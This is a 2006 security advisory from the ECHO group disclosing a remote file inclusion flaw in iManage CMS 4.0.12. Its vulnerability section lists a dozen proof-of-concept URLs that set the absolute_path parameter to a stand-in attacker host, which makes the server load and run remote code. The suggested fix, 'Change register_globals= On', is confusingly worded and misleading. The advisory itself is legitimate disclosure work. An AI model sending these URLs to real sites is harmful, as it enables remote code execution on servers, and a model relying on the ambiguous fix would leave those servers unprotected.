|
ECHO.OR.ID=0D
ECHO_ADV_40$2006=0D
---------------------------------------------------------------------------------------------------=0D
[ECHO_ADV_40$2006] iManage CMS <= 4.0.12 (absolute_path) Remote File Inclusion=0D
---------------------------------------------------------------------------------------------------=0D
=0D
Author : Ahmad Maulana a.k.a Matdhule=0D
Date Found : July, 20th 2006=0D
Location : Indonesia, Jakarta=0D
web : http://advisories.echo.or.id/adv/adv40-matdhule-2006.txt=0D
Critical Lvl : Highly critical=0D
Impact : System access=0D
Where : From Remote=0D
---------------------------------------------------------------------------=0D
=0D
Affected software description:=0D
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~=0D
iManage CMS from Imaginex-Resource=0D
=0D
Application : iManage CMS=0D
version : 4.0.12 stable=0D
URL : http://www.imaginex-resource.com=0D
=0D
---------------------------------------------------------------------------=0D
=0D
Vulnerability:=0D
~~~~~~~~~~~~~~~~=0D
=0D
-----------------------component.php----------------------=0D
....=0D
http://target.com/[path]/articles.php?absolute_path=http://attacker.com//inject.txt?=0D
http://target.com/[path]/contact.php?absolute_path=http://attacker.com//inject.txt?=0D
http://target.com/[path]/displaypage.php?absolute_path=http://attacker.com//inject.txt?=0D
http://target.com/[path]/faq.php?absolute_path=http://attacker.com//inject.txt?=0D
http://target.com/[path]/mainbody.php?absolute_path=http://attacker.com//inject.txt?=0D
http://target.com/[path]/news.php?absolute_path=http://attacker.com//inject.txt?=0D
http://target.com/[path]/registration.php?absolute_path=http://attacker.com//inject.txt?=0D
http://target.com/[path]/whosOnline.php?absolute_path=http://attacker.com//inject.txt?=0D
http://target.com/[path]/components/com_calendar.php?absolute_path=http://attacker.com//inject.txt?=0D
http://target.com/[path]/components/com_forum.php?absolute_path=http://attacker.com//inject.txt?=0D
http://target.com/[path]/components/minibb/index.php?absolute_path=http://attacker.com//inject.txt?=0D
http://target.com/[path]/modules/mod_calendar.php?absolute_path=http://attacker.com//inject.txt?=0D
=0D
and more Affected files=0D
=0D
=0D
Solution:=0D
~~~~~~~~~=0D
- Change register_globals= On =0D
in php.ini=0D
- Sanitize variable $absolute_path on affected files.=0D
=0D
---------------------------------------------------------------------------=0D
Shoutz:=0D
~~~~~=0D
~ solpot a.k.a chris, J4mbi H4ck3r for the hacking lesson :) =0D
~ y3dips,the_day,moby,comex,z3r0byt3,c-a-s-e,S`to,lirva32,anonymous=0D
~ bius, lapets, ghoz, t4mbun_hacker, NpR, h4ntu, thama=0D
~ newbie_hacker@yahoogroups.com, jasakom_perjuangan@yahoogroups.com=0D
~ #mardongan #jambihackerlink #e-c-h-o @irc.dal.net=0D
------------------------------------------------------------------------=0D
---=0D
Contact:=0D
~~~~~~=0D
=0D
matdhule[at]gmail[dot]com=0D
=0D
-------------------------------- [ EOF ]----------------------------------=0D